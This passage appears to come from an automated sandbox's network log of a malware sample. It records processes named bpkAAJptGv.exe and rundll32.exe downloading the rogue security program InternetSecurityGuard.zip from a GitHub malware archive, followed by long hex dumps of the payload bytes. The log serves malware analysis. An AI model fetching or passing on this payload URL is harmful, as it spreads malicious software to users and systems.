                                                                                                                                                            2022-09-29 12:45:06 UTC13426INData Raw: 67 50 83 80 71 50 45 6a 88 9f 7b bf 4c dd 42 64 79 1e e3 2b 17 1d a2 51 7c 03 26 75 28 9d d4 be 69 87 c4 27 80 69 60 0c 1a 43 3b 0b a8 58 5f 8e 1a 3a e0 cc 4a d4 1c 99 25 fb bd 4a 7f 43 44 d9 7b 44 08 b1 f3 34 b9 f7 79 f4 c0 26 5b c3 be f0 8d 48 1d b8 33 c4 ef 82 58 cd 3c 5d 3b 71 d2 ad 4d 44 cd 48 6e cf 4f 4e 89 16 6e d4 41 ec 5a 0d ce 6f 78 9d 7e a6 3c e2 58 5e 89 66 f7 ad f5 42 4c 24 70 fb 97 3f df ff 46 c8 1c b5 48 3c d4 19 f0 8a 54 82 fc b9 56 0e d1 2d 1a 97 53 1a 68 b1 7d 0e f0 88 f8 77 07 de 15 cb 09 4b a0 ab d0 5b 2b 58 71 0b 91 51 13 86 13 c1 31 dd 77 dd d1 0b e1 59 c5 02 d3 2e 89 82 60 73 76 8b 77 af 30 ff fd 9b d7 71 92 a5 bd 73 c5 61 5a d1 1a a3 92 58 23 09 ec 49 8b 6f 00 a6 48 11 38 74 92 d1 3f 6f 78 3c 76 50 a6 25 37 43 f8 24 5d 98 88 ad ac
                                                                                                                                                            Data Ascii: gPqPEj{LBdy+Q|&u(i'i`C;X_:J%JCD{D4y&[H3X<];qMDHnONnAZox~<X^fBL$p?FH<TV-Sh}wK[+XqQ1wY.`svw0qsaZX#IoH8t?ox<vP%7C$]
                                                                                                                                                            2022-09-29 12:45:06 UTC13442INData Raw: 01 90 39 82 95 1e 43 c5 57 a7 fe 58 fa 96 c3 c5 1c b6 bc 59 20 60 0a b6 e8 49 5b 58 d0 27 45 df 96 8f 54 08 c4 bf 2c c6 aa a2 55 58 a8 cd 8b 49 dc 79 48 2f 15 3e 42 7f 6e 3d be 74 45 ea a6 4d fa 71 83 81 3e 4b a9 89 2c b7 ab 08 22 01 da 4e 40 d6 3f d5 30 1c 1e 0b 0b 49 68 6d d3 f0 6e 90 d8 47 ff 3e b3 c7 0e 0d 02 27 ab a2 53 82 60 80 cd 5b 0b 02 05 87 1e 49 6b b0 22 6d 2a 5c 3b a8 4e 3f c9 ec 25 39 06 88 e3 60 d2 08 81 c3 c4 4a 9f 42 7a d8 05 f0 3f 61 dc c8 c3 bf 8b 31 7c 22 c6 de 86 83 22 5a 23 e1 2c 05 59 a1 ca 23 e1 a9 38 36 a0 fc a4 cc 81 63 de 59 26 82 3c a8 4d ab 44 31 fe 58 06 e2 22 d1 df 06 43 ae 17 b2 4f 89 18 0a 81 35 72 6d ff f9 53 1c 7f f4 3c ad 1b 1d 40 b0 96 c8 fd e0 b8 45 14 c6 c0 ca 54 62 b3 b3 3f bf f7 56 c8 81 1f 60 f0 df 3d e3 b9 ed 20
                                                                                                                                                            Data Ascii: 9CWXY `I[X'ET,UXIyH/>Bn=tEMq>K,"N@?0IhmnG>'S`[Ik"m*\;N?%9`JBz?a1|""Z#,Y#86cY&<MD1X"CO5rmS<@ETb?V`=
                                                                                                                                                            2022-09-29 12:45:06 UTC13458INData Raw: 3b 50 e1 9b 84 4b b9 cb ea 5a f4 87 1a 39 09 32 81 26 7d ed 46 1e 34 31 12 d7 cc 4e 31 0e 63 4a 71 20 27 02 4b b1 a4 5f 4a 1d 02 da 8c ba ef 6d 63 24 b6 05 13 cd 2e 4b 32 db 52 fb 9b 37 8f 7f bc e5 0b 43 b0 4e b5 63 36 6a 20 d9 fc c4 ef 42 7d f7 b3 2c 32 12 36 47 a9 bd 9a 6b 9d d5 15 c5 50 eb a2 e6 fd 8d 9d 45 c7 89 6b d0 2a d5 a6 b3 88 ec 6e 24 d5 e6 20 fb 3c 27 df b1 80 7d 1f 85 57 8a 0c 08 d6 ca 1d 7f 16 7a 4d 81 91 cb 7d ee 66 9b 11 16 4f 3c ae 9f be 11 ed 5d 5e 97 5f 61 a6 fc 2d 12 3f 0e 57 7c 2a 1a 4a 4d 07 65 00 fa 00 9c 41 1c 6b d5 6e 3f b1 3c e1 bb 81 15 c7 12 77 b1 61 9c b6 ec 97 df 03 e7 36 1d 99 20 b8 1a 47 6d c1 a6 cb 44 d1 56 6b 1e 09 2e 13 ec 7c 67 b7 35 46 d4 1d 87 c4 52 fc bb 64 8b 0c d2 98 f2 1c 42 f8 13 65 2b 73 10 ce 3e 0d d8 d3 0c be
                                                                                                                                                            Data Ascii: ;PKZ92&}F41N1cJq 'K_Jmc$.K2R7CNc6j B},26GkPEk*n$ <'}WzM}fO<]^_a-?W|*JMeAkn?<wa6 GmDVk.|g5FRdBe+s>
                                                                                                                                                            2022-09-29 12:45:06 UTC13474INData Raw: 4a 1e 40 de 3f 78 a0 1e 59 99 8d 5b 08 a4 c1 1a 57 c1 8c 50 9e 1e 27 80 7c 2e c2 64 81 4f 76 4a a7 6c fb 44 0f 9d 7d b1 21 bd c3 e6 e8 37 f8 72 cd 39 b5 9f 15 02 e0 e0 52 a7 2b 34 ab 36 c4 5f 60 dd 7d 2c 92 4f 77 c9 77 85 a6 5a c1 b9 2a 8a 24 33 30 4e e4 cc c1 ad 12 a6 6e 99 0a a2 c2 8a d7 29 bd 0f 62 5a 6a c8 1d 63 db 4d c2 ad a8 f3 e4 e5 77 0d a7 ab 6f 19 4c 63 6b ed c1 09 cb 3f fa 50 5c ae 9c da c0 f1 f0 02 62 58 bc c8 0a e4 7a 1f d4 f1 c7 54 a8 cb a6 a0 87 5e 02 67 2f ed fb ba 91 61 fa c8 de 16 59 1f ae 73 03 06 bd a0 5d 78 12 eb e8 3c 01 c2 46 d3 40 0c d8 7f 96 2f a0 4b 61 1e ca af 71 4e 8d d4 6e f5 62 2f b3 58 d7 56 49 61 10 d9 76 d5 2f 58 ed 61 d5 66 69 11 80 1b 3d 53 4c b2 1c 85 90 36 ac a9 f9 27 e8 a2 0c 1d 8c 93 19 d5 26 be 24 a7 a5 f2 a5 bc bb
                                                                                                                                                            Data Ascii: J@?xY[WP'|.dOvJlD}!7r9R+46_`},OwwZ*$30Nn)bZjcMwoLck?P\bXzT^g/aYs]x<F@/KaqNnb/XVIav/Xafi=SL6'&$
                                                                                                                                                            2022-09-29 12:45:06 UTC13490INData Raw: 14 ac e1 79 cb cb 63 67 f1 0c 8c 2d dd be e1 68 0f 1a bb 7a 78 ed 8b c5 23 cb 24 d3 a6 95 22 61 0a 71 d9 23 33 4b c8 dd a3 80 78 bd 4d f8 3d f6 0d 42 0f 75 05 0a 4a 79 54 f0 d8 6d a5 b4 c2 ea c3 74 0e c5 40 d0 3e 53 4a dc 68 4a 86 de 21 cc 90 ea 1d 0c 27 d4 c4 d0 68 9e 77 eb 34 c9 d7 d4 72 ef 39 a6 01 d0 0b 7f 67 2b 9d f3 59 ec 26 de 72 4d 3a 5a cb 14 18 54 28 8d b5 54 d4 a0 78 75 79 cb 8f 9d 32 65 88 a4 f7 73 17 81 8a b3 06 5a 51 cc 09 5b eb 66 33 8e 45 84 20 d0 36 14 8a f8 b6 df c6 7f 72 95 fa 47 1a 95 7c 67 f0 97 99 3e b4 c0 74 60 68 f9 02 50 5f 50 73 f7 7a 6d f7 02 37 a9 91 08 16 49 52 d8 51 d0 4e a8 c8 a5 9f b1 96 72 1e 8a 0f 53 1b 6d 59 14 b7 08 50 03 02 c3 7a 6c 1c 0b 33 c6 1d 55 8e 41 a4 b0 7a e3 8d 7b 3a 78 3a 84 e9 11 df b1 fe d4 a6 3b c5 ee 03
                                                                                                                                                            Data Ascii: ycg-hzx#$"aq#3KxM=BuJyTmt@>SJhJ!'hw4r9g+Y&rM:ZT(Txuy2esZQ[f3E 6rG|g>t`hP_Pszm7IRQNrSmYPzl3UAz{:x:;


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            82192.168.2.649749140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:06 UTC13499OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            83140.82.121.4443192.168.2.649749C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:06 UTC13499INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:06 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:06 UTC13500INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            84192.168.2.649750185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:07 UTC13501OUTGET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            85185.199.110.133443192.168.2.649750C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:07 UTC13501INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 2580873
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "9adcf2d9882d51d3dfdb11b5740aa53cd370781402b00f1834dcef303c637853"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: BC88:67BA:7CF8:C44B3:63359353
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:07 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6942-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455507.052251,VS0,VE745
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: be889bc67d222dcc1df28a8f8cc4e121233d467f
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:07 GMT
                                                                                                                                                            Source-Age: 1
                                                                                                                                                            2022-09-29 12:45:07 UTC13502INData Raw: 50 4b 03 04 33 00 01 00 63 00 cd bb 2e 40 00 00 00 00 a5 60 27 00 00 40 62 00 24 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 49 6e 74 65 72 6e 65 74 53 65 63 75 72 69 74 79 47 75 61 72 64 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 5e 98 e3 cd 5d 7c 53 2d 9b 98 4f b5 7f 8f a4 41 23 fe 23 91 07 b9 55 ef 04 a3 c3 25 84 d2 88 da 08 89 21 d4 dd cf bf bb 58 d0 34 08 6d a9 a7 59 c6 4d 94 22 06 41 c5 ca 01 e2 9a 75 f1 bb 6c 2a 35 7a 71 8b a4 f2 1c 7a bd 0c e0 51 5d cf 08 aa 6e f9 ad a0 63 eb 59 bf 47 bb bb 28 99 fe 4f c6 8d 89 10 07 d6 11 a7 18 84 53 93 bd 67 78 cc 28 2c 6e c5 37 04 4d ea 9e a5 9e 0a 8d 6d d9 94 da 64 fa b7 14 f3 0b 0d 0c 69 42 e7 90 1e 53 46 a0 30 30 f1 19 73 eb 36 37 ae 82 27 0c e6 8b 65 b4 56 69 1a fa 91 3f 46 61 08 c2 8c 36 32 8f fd 45 7d 1b
                                                                                                                                                            Data Ascii: PK3c.@`'@b$Endermanch@InternetSecurityGuard.exeAE^]|S-OA##U%!X4mYM"Aul*5zqzQ]ncYG(OSgx(,n7MmdiBSF00s67'eVi?Fa62E}
                                                                                                                                                            2022-09-29 12:45:07 UTC13504INData Raw: 83 dc 83 f6 66 a5 fa 99 62 44 02 c8 12 c3 3a bd 59 17 fe c5 9b d0 32 37 8a 7c 82 51 3d c7 3f be db 5d b7 e3 ae 04 65 c6 de 99 27 9f 24 96 49 e2 97 0e 24 ea 4e 43 d4 de 82 08 f6 18 05 b8 50 58 3b 22 8b a9 80 e1 8d f8 6d 9e 18 8b 38 ee 56 86 ae e1 c7 d5 96 26 49 44 d5 0c 13 5b ce 65 55 d0 12 9e e8 33 2e 79 1c 5d d7 06 6b f8 bf 49 0e 00 d8 65 84 af 3f d3 ba 72 96 57 5c cf 56 5b 8f 2c 9b 5e 2c c3 3c 7e 3b 11 4f dd e8 88 98 e0 6c 5d 82 27 7a c5 1c 87 b1 e5 29 8e 69 e9 29 89 7f c3 89 c7 43 8d b6 4e 0b ab ec d1 a3 13 53 c0 ff 5f 4c fc 3a 8b 1d 95 5c f8 04 9d 9c 41 02 63 20 b0 36 54 b6 4d 39 d3 dc 8a 30 5d a3 50 f9 81 6e d5 dc 4e 05 9d 1b 4b d4 71 dd 06 c6 00 97 9d 7a f2 82 f5 ba f7 b0 9c 0f 50 f2 f3 79 d6 8b 6b 4d cc 2c b6 cb 90 22 10 b2 08 d3 2b 87 f7 89 33 36
                                                                                                                                                            Data Ascii: fbD:Y27|Q=?]e'$I$NCPX;"m8V&ID[eU3.y]kIe?rW\V[,^,<~;Ol]'z)i)CNS_L:\Ac 6TM90]PnNKqzPykM,"+36
                                                                                                                                                            2022-09-29 12:45:07 UTC13505INData Raw: 1a 99 a0 e7 69 91 77 fa cc 9e a0 e9 a4 42 fe 38 5f 78 e2 78 c3 32 ac aa b0 33 60 00 c9 39 07 21 1f 0a e4 39 34 35 ec 88 4c 1e 38 be 87 33 45 42 13 88 67 17 7f e0 72 53 6a 5f d0 3a f5 ab 4d 5e 9d 18 72 7d 1f 53 be e0 bf 9f 64 7a c3 3e 53 c7 40 cf 28 30 a7 57 b6 b5 51 b3 05 65 46 57 e4 44 e2 9e 22 3d 52 6d e0 c3 67 d4 9b 3a 5e 98 af 1f 13 0f 19 c4 86 fb 21 ae 0e f0 89 6f 34 2c 2c 06 74 67 f6 8a c5 0e f0 15 69 f6 5e da 87 f2 20 f4 e4 c3 d0 5e ec 7b 01 f8 6f 82 6a ab b3 eb c3 04 cb 33 58 58 68 5a 24 4e 72 c3 48 35 fe 12 87 39 23 30 ba f1 6a 52 ed ec f4 47 c2 6e 50 f3 33 11 e8 91 63 fe 6b b0 e8 8b 08 50 39 0f 66 ff fd da b5 8f 4b 76 fc 60 c0 1a 0c 0b fd 0e 0a 76 16 15 fa 1a 1b 42 a0 97 24 8b 2d 77 4f 78 3a 5c 27 3d 6d 97 5a 45 b7 52 a9 42 eb 6d bb 08 c9 e5 da
                                                                                                                                                            Data Ascii: iwB8_xx23`9!945L83EBgrSj_:M^r}Sdz>S@(0WQeFWD"=Rmg:^!o4,,tgi^ ^{oj3XXhZ$NrH59#0jRGnP3ckP9fKv`vB$-wOx:\'=mZERBm
                                                                                                                                                            2022-09-29 12:45:07 UTC13506INData Raw: 05 97 65 25 2d de 3c 06 23 bd a1 ad 75 9e 7f 2c 32 15 52 68 9b e9 ce b4 fe 0c b6 5c 0c bf 59 dd 2f 44 a9 dc 62 5c ae dc 65 46 cd c7 41 1e 05 a7 c2 14 97 d4 7d c3 ab 0f 2d aa 52 05 15 8e 19 2c 36 68 d3 0b 71 74 b5 0c 22 21 5e 88 12 df 68 d2 5a 55 0d 76 f5 cc 9f 1f be fd f4 cf 58 b9 a3 cd d9 a7 12 39 f2 47 8e 88 38 64 fb f8 80 c1 4e f3 97 7c 10 8f b4 9b c0 96 3d f3 67 09 60 4d 32 a2 91 69 95 47 f6 93 f1 27 77 26 8b a0 4c d4 55 dc e0 65 9e 91 34 92 76 0c ca b5 6d 13 c5 64 3f 34 51 74 bc 15 be 7f 3c e7 da 88 65 83 e3 e4 34 04 bc 43 14 78 1c 3f 5c 98 92 2c 20 0d a3 d9 8f 90 72 3f d8 b1 7a fe c4 c6 c3 e0 2a 23 7d 9d bc f4 c5 52 a6 85 23 d5 e5 74 2f af 18 20 33 c1 de a3 84 51 b3 82 38 cc 72 cc 60 31 7e 5e 1b ca b1 6f 6a f6 63 99 65 3c 63 6b ba 6d 01 89 bd 7e 6c
                                                                                                                                                            Data Ascii: e%-<#u,2Rh\Y/Db\eFA}-R,6hqt"!^hZUvX9G8dN|=g`M2iG'w&LUe4vmd?4Qt<e4Cx?\, r?z*#}R#t/ 3Q8r`1~^ojce<ckm~l
                                                                                                                                                            2022-09-29 12:45:07 UTC13508INData Raw: 1e 67 a9 12 14 43 59 76 df 20 2a f1 b9 d9 0f ca 9a 1a a8 eb 07 65 79 86 06 a1 d0 ee 38 77 64 bb 4d a2 36 b5 43 7d 9e ed 56 11 45 f6 a7 97 12 88 50 5a 1c ce 47 5a 3d 4c 2e f1 1d 41 dd 3b 28 61 f1 0c c1 e6 54 44 e4 fb e6 02 60 a3 09 ab 76 39 01 ec 91 89 c0 ff b9 4d 88 ce 25 eb 51 4a 68 8a 5d a9 e2 3a e6 f5 14 97 b5 b3 eb 9d fa 4e 96 4d 6f c6 61 c6 b9 8e 9d df 7e f1 9b d1 48 c3 23 e9 2f a0 11 bf e2 22 11 4f 59 cb 25 25 49 6a b1 c8 77 93 4b 4a 63 da 70 a2 89 74 a3 19 c7 a9 67 87 e4 f2 e0 95 b3 c4 57 f7 02 3b b2 d5 b9 fb 9f 68 9b f3 de 4b 4b 41 83 eb 54 d6 52 37 40 13 dc 7c d9 31 50 0f 5b 74 bc 42 a2 06 11 5e 7f 61 6c e7 f6 b4 4d d7 25 12 67 30 cc 10 a3 54 9c 14 96 c9 6c 7f a0 01 0b 56 c1 d3 f3 81 46 54 91 7a 5e 04 3f 59 27 90 19 85 a2 3f b5 ea d4 20 40 cd 37
                                                                                                                                                            Data Ascii: gCYv *ey8wdM6C}VEPZGZ=L.A;(aTD`v9M%QJh]:NMoa~H#/"OY%%IjwKJcptgW;hKKATR7@|1P[tB^alM%g0TlVFTz^?Y'? @7
                                                                                                                                                            2022-09-29 12:45:07 UTC13509INData Raw: f2 42 eb 12 bd 7b 2a b5 07 47 bd 7c 97 67 e1 72 cf c5 df 66 d2 21 d0 33 24 4a 55 51 d5 cc dd 4b 52 12 50 83 17 1c 62 c5 a0 ff ed 12 77 70 fb f2 2f 45 f5 30 49 ad 49 26 b3 ed 7c c7 c9 13 ce 02 e9 a6 fa f0 6d c6 e4 44 70 d9 38 3e b8 63 2c af 78 22 12 05 2d 18 73 7a c6 20 cd de 44 ad e1 7a e2 c5 0e ad 1d 03 7c 8a 2e bf 25 e4 e0 69 f8 2c e1 73 d7 54 75 dc 8a 56 97 8b a3 1b d6 41 7d b5 26 75 27 a4 0d ed 42 24 ed 8b 41 80 fe d2 f0 3d a9 48 f4 04 7c 01 3b e8 9b fc 9f 6b fc 7c 25 1e 4a 1e f1 d0 83 1d d0 8c 8f 30 64 45 2e 00 fe fc 0d a2 b6 fa fb b6 ef 01 65 a3 23 44 1a f8 bf c4 2c c0 98 7e 80 19 01 b6 63 c0 ec 09 82 16 27 37 cf 66 ab 51 52 c0 5e 86 1e 73 69 4a c1 08 d4 89 20 ab ca f9 8e c8 34 5a d1 ca 19 14 d1 44 6b 22 87 cb 01 9d e5 37 e3 8b 34 6d e7 55 a4 fb df
                                                                                                                                                            Data Ascii: B{*G|grf!3$JUQKRPbwp/E0II&|mDp8>c,x"-sz Dz|.%i,sTuVA}&u'B$A=H|;k|%J0dE.e#D,~c'7fQR^siJ 4ZDk"74mU
                                                                                                                                                            2022-09-29 12:45:07 UTC13510INData Raw: 7f 70 9e c4 57 ca 25 90 c7 68 bf 51 4b be 03 4e 08 67 1e fc 02 da 1a d5 ce d1 b8 f5 65 ab 90 b0 4b a8 c1 4f 62 ce 51 c4 4a 95 38 29 c9 84 c7 eb 06 00 d7 1f 4d 6a e7 44 1a 67 b8 d4 3d e3 22 3d 6f 29 b8 0c 48 16 25 ee 68 fc b1 7e 6a 4c 9f d7 e5 0b 99 64 fc ab c1 67 66 fe 13 4a 54 e2 73 54 7f 91 7b 8f aa d8 83 b1 56 63 55 71 2d ec 3b 2f eb 54 f8 49 7d cf 29 25 6f 5b d9 07 66 63 fc ef 0b e5 03 16 a7 7b 8f 90 00 38 68 61 01 db 42 08 aa 95 2a df 06 ee 7c af 7d 15 7f 08 cb b5 71 c6 74 db 16 2f 6b 10 6b 4b 30 cb 77 22 a3 96 5b 89 e4 d7 79 a0 58 66 e8 9f 8a ce 02 0b 01 9f e8 6b 70 65 05 4f e1 1a 28 18 eb a9 68 fd 63 53 50 0f a2 78 bb 15 a9 a9 0e 2d 0d e1 98 21 2c a4 96 c6 ce 4f 63 d3 8e 08 83 44 d2 a8 c6 0c a0 11 08 78 0a 6b 5d 66 39 2b f4 57 51 0f 08 84 e4 66 a6
                                                                                                                                                            Data Ascii: pW%hQKNgeKObQJ8)MjDg="=o)H%h~jLdgfJTsT{VcUq-;/TI})%o[fc{8haB*|}qt/kkK0w"[yXfkpeO(hcSPx-!,OcDxk]f9+WQf
                                                                                                                                                            2022-09-29 12:45:07 UTC13512INData Raw: 47 b5 b7 85 40 c2 12 cf cc df d1 98 79 68 53 e4 0c c9 82 1c 52 3d 7a a7 1c 3b e5 fe c7 2c e9 87 bc 7e 04 17 b7 20 2d cb 41 59 d2 57 7d e6 2a e1 2e 52 21 68 f9 ea 0e 33 73 ab b0 e8 7b 28 0f 7f 32 73 f7 fb 91 7c fc 90 36 57 0f fc 41 2b 6d d4 c3 37 70 df 96 d3 ab 4a 3c c9 ca 77 24 c9 28 9e 13 ef 7c 1a 2b 1d 64 c9 16 60 43 ee 6c 1b fc bd 1e 74 4e c5 29 11 6d 4e 03 ff b4 b8 b6 72 ad 9c 17 4c b5 f3 5d 67 a6 79 06 c4 b7 d0 7e 8a bc 1c 06 4f a8 6d 2e 4e c0 31 1b 65 e7 45 62 75 47 20 21 e7 66 c9 01 e5 a7 83 74 1c d2 61 82 41 1d 42 98 8a 7a 45 0b d3 a7 12 5c e4 67 f3 ae 00 db 3b d3 0b a7 8d 2e 13 0f a8 19 7e 7e 7d ee 75 6d 47 18 9a 53 32 b2 47 30 fa 0c ae 81 90 7c 74 26 cb e9 5b d1 6c ba 2e d1 2c bf 76 22 5d 37 34 be c4 56 1f 33 f3 bb 2f 71 a1 e1 eb 83 fc 17 d7 1f
                                                                                                                                                            Data Ascii: G@yhSR=z;,~ -AYW}*.R!h3s{(2s|6WA+m7pJ<w$(|+d`CltN)mNrL]gy~Om.N1eEbuG !ftaABzE\g;.~~}umGS2G0|t&[l.,v"]74V3/q
                                                                                                                                                            2022-09-29 12:45:07 UTC13513INData Raw: 47 73 e9 ca 34 b9 b8 2d b4 5b 07 09 d6 f2 5e 33 85 da 1e f8 42 88 d9 8d cd 05 f3 01 66 d1 05 ce 3e 45 5c 7f d5 02 0a 80 2e 15 27 44 06 44 b3 26 ac 87 34 11 da aa 33 39 d1 c5 fc 76 2d 5b ed e9 69 97 41 44 2d 01 b3 18 3f 9c fb 07 51 6e 40 e6 11 b1 77 77 4f d5 1c 9d 0b 25 18 7a 99 e3 62 c4 85 2c 94 e4 86 e0 01 29 22 6e d9 27 02 14 0f a1 00 5c 87 f4 d9 ea 9e d6 80 fa c5 ac eb 97 94 b9 5f 69 33 e5 99 91 b8 83 41 62 74 03 89 ad c1 60 dd a5 10 e7 08 13 87 22 29 c2 a5 52 46 a8 a1 31 c7 4e 8a 2d 9b 3d 0a 65 c6 d5 57 2b 4d af 89 b5 78 5b 5d cb 1c ee 92 1f 5a 29 93 88 b8 92 bf 9e 54 7a b7 d9 04 40 af 78 5b 73 20 e6 62 c5 d2 98 14 db ac 0f 1a f2 be 9e ea 60 fc 17 ce 8e ed 5b 82 7e 5b c1 ec c0 97 d2 a8 8c 23 75 a3 d1 22 ab b6 f3 36 55 3f 4a b1 cc 3d 90 c9 8f be 00 b4
                                                                                                                                                            Data Ascii: Gs4-[^3Bf>E\.'DD&439v-[iAD-?Qn@wwO%zb,)"n'\_i3Abt`")RF1N-=eW+Mx[]Z)Tz@x[s b`[~[#u"6U?J=
                                                                                                                                                            2022-09-29 12:45:07 UTC13514INData Raw: b4 d8 b8 2c 18 98 f2 9d 0a 9f e0 d0 c7 f0 af 45 cf 25 99 83 cb 90 e3 5c 65 3d 34 5d 96 b8 6f bb 90 69 0c 2d 6b 0f 82 8d 00 45 41 d2 2a 56 e0 18 e8 40 87 01 89 b2 23 f0 55 e3 47 55 84 d3 32 a7 47 02 c3 bd 49 1c 61 5b f3 3e c0 5f d4 7e 36 9a e8 00 be 05 01 60 d0 6f 91 05 8a 98 dc 66 01 ed d7 f9 16 95 de 87 45 ce 12 7c 17 09 5c 1b ca 0e 55 0c 3e 6b df 0e a5 2f e2 a5 87 b2 a2 76 e2 f4 1c e3 3f 16 7e 94 07 27 ce a8 92 29 30 25 c4 0c f5 cf e7 86 4c 68 8e 66 7b 5c 51 5e 64 f6 b6 3f 72 8a 4a a8 5d 4e 11 b7 91 eb b7 90 d1 ab ab d8 a8 3c 3c 6a 5d ff fe 37 ef 23 59 d8 e8 a6 b8 ab 98 54 45 21 65 f4 66 8f d6 9b 4e fd 91 24 91 4f 9f 9e 51 8e 85 1b c7 0a 55 89 75 1d 25 a4 74 8c 9c ba a6 76 db 86 ae 93 02 89 7c 5d fe b1 5e cd 73 9a f6 70 16 ea 7d af e2 0f 6c f8 6f 3a 73
                                                                                                                                                            Data Ascii: ,E%\e=4]oi-kEA*V@#UGU2GIa[>_~6`ofE|\U>k/v?~')0%Lhf{\Q^d?rJ]N<<j]7#YTE!efN$OQUu%tv|]^sp}lo:s
                                                                                                                                                            2022-09-29 12:45:07 UTC13516INData Raw: 78 d4 0b 94 9f cb 13 91 7e 6c 96 fa 7f d6 0c f7 59 af 3e 38 b9 74 90 e5 a2 46 db 4d 26 67 7f f8 aa b1 1a 08 3b e4 c7 25 6d 45 7b 64 ba 92 cb 8a a8 95 8d 62 9d 66 89 d0 0d 01 7f a0 9f d0 c8 de 65 40 b4 c9 65 ec 2a 2e d3 5f a3 c7 e1 89 ec 96 89 ed 1d bf 64 9b 74 49 81 8a 3b 7f 7d de 74 d0 2f 07 4e 1f 60 ff dd e6 1e 32 74 3b c9 9e 95 58 01 43 98 d0 74 c4 0e 87 c9 14 40 7f 64 e2 7b 30 54 07 99 3b 4f eb b1 f3 6b 1c 76 c5 e3 03 bf 90 48 cb d6 5a 10 19 98 df a0 77 ac de 53 73 ca 8a 0b e5 d8 1c e7 1d c8 c2 a6 9f 2c d2 6f b4 20 c7 6f 50 1f aa 71 ec b0 a4 8d fb 0f 98 ac 47 ae ac db a8 fd 58 a7 3d 12 9b e2 c2 3b 73 28 52 4b 59 34 02 c4 72 b6 16 bd 19 43 bc 81 2d 1d e5 3d 08 bf ab 12 52 99 fd bb 3b 1c bd ef 93 0c ad 13 71 7c 53 8c b8 2e 3e 67 f5 5a 6b 38 30 8f 46 22
